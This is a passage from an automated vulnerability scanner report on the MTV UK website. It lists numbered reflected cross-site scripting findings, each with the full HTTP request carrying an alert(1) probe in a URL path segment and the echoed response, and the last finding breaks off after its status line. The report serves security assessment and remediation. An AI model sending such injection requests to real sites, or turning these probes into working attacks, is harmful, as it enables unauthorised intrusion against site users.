Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/gsa/opensearch.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd3bd"-alert(1)-"d480e12847b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitesdd3bd"-alert(1)-"d480e12847b/all/modules/gsa/opensearch.xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:52 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13447
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:52 GMT
Date: Mon, 12 Sep 2011 12:50:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
om.mtvi.reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sitesdd3bd"-alert(1)-"d480e12847b/all/modules/gsa/opensearch.xml");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttri
...[SNIP]...

2.104. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/gsa/opensearch.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88542"-alert(1)-"d7718f9560d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all88542"-alert(1)-"d7718f9560d/modules/gsa/opensearch.xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:59 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13445
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:51:02 GMT
Date: Mon, 12 Sep 2011 12:51:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
tvi.reporting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all88542"-alert(1)-"d7718f9560d/modules/gsa/opensearch.xml");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute
...[SNIP]...

2.105. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/gsa/opensearch.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40c5d"-alert(1)-"39abbfac80 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules40c5d"-alert(1)-"39abbfac80/gsa/opensearch.xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:51:12 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13439
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:51:13 GMT
Date: Mon, 12 Sep 2011 12:51:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
rting.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules40c5d"-alert(1)-"39abbfac80/gsa/opensearch.xml");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10
...[SNIP]...

2.106. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/gsa/opensearch.xml

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7899"-alert(1)-"456b488dfcc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/gsaf7899"-alert(1)-"456b488dfcc/opensearch.xml HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:51:38 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13439
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:51:38 GMT
Date: Mon, 12 Sep 2011 12:51:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
g.Dispatcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/gsaf7899"-alert(1)-"456b488dfcc/opensearch.xml");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "
...[SNIP]...

2.107. http://www.mtv.co.uk/sites/all/modules/gsa/opensearch.xml [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/gsa/opensearch.xml

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d010"-alert(1)-"bf7411a02bc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/gsa/opensearch.xml9d010"-alert(1)-"bf7411a02bc HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Last-Modified: Mon, 12 Sep 2011 12:51:47 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13439
Vary: Accept-Encoding
Expires: Mon, 12 Sep 2011 12:51:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 12 Sep 2011 12:51:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...

com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/gsa/opensearch.xml9d010"-alert(1)-"bf7411a02bc");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.108. http://www.mtv.co.uk/sites/all/modules/mtv_videobrowse/mtv_videobrowse.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/mtv_videobrowse/mtv_videobrowse.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25ac1"-alert(1)-"0a5748c1d7d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/mtv_videobrowse/25ac1"-alert(1)-"0a5748c1d7d?1274367484 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:05 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13437
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:05 GMT
Date: Mon, 12 Sep 2011 12:50:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
);
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/mtv_videobrowse/25ac1"-alert(1)-"0a5748c1d7d");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.109. http://www.mtv.co.uk/sites/all/modules/nice_menus/nice_menus.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/nice_menus/nice_menus.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d83e"-alert(1)-"d0b389f7668 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/nice_menus/7d83e"-alert(1)-"d0b389f7668?1234890325 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:05 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13431
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:05 GMT
Date: Mon, 12 Sep 2011 12:50:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/nice_menus/7d83e"-alert(1)-"d0b389f7668");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.110. http://www.mtv.co.uk/sites/all/modules/nice_menus/nice_menus_default.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/nice_menus/nice_menus_default.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b42df"-alert(1)-"7b9aaed79b2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/nice_menus/b42df"-alert(1)-"7b9aaed79b2?1309439822 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:01 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13431
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:02 GMT
Date: Mon, 12 Sep 2011 12:50:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/nice_menus/b42df"-alert(1)-"7b9aaed79b2");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.111. http://www.mtv.co.uk/sites/all/modules/top_tabs/top_tabs.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/top_tabs/top_tabs.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98e58"-alert(1)-"5d8b7fc99da was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/top_tabs/98e58"-alert(1)-"5d8b7fc99da?1244458641 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:07 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13421
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:07 GMT
Date: Mon, 12 Sep 2011 12:50:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
atcher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/top_tabs/98e58"-alert(1)-"5d8b7fc99da");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.112. http://www.mtv.co.uk/sites/all/modules/user_optin/user_optin.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/modules/user_optin/user_optin.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dbf9"-alert(1)-"7de6b6466d6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/modules/user_optin/9dbf9"-alert(1)-"7de6b6466d6?1241187880 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:05 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13427
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:05 GMT
Date: Mon, 12 Sep 2011 12:50:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/modules/user_optin/9dbf9"-alert(1)-"7de6b6466d6");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.113. http://www.mtv.co.uk/sites/all/themes/mtvuk/blueprint/blueprint/print.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/blueprint/blueprint/print.css

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b08dd"-alert(1)-"477bf834596 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/blueprint/blueprint/b08dd"-alert(1)-"477bf834596?1234890284 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:07 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13455
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:07 GMT
Date: Mon, 12 Sep 2011 12:50:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
m.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/blueprint/blueprint/b08dd"-alert(1)-"477bf834596");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.114. http://www.mtv.co.uk/sites/all/themes/mtvuk/blueprint/blueprint/screen.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/blueprint/blueprint/screen.css

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13e42"-alert(1)-"a0ad2d31b48 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/blueprint/blueprint/13e42"-alert(1)-"a0ad2d31b48?1235581642 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
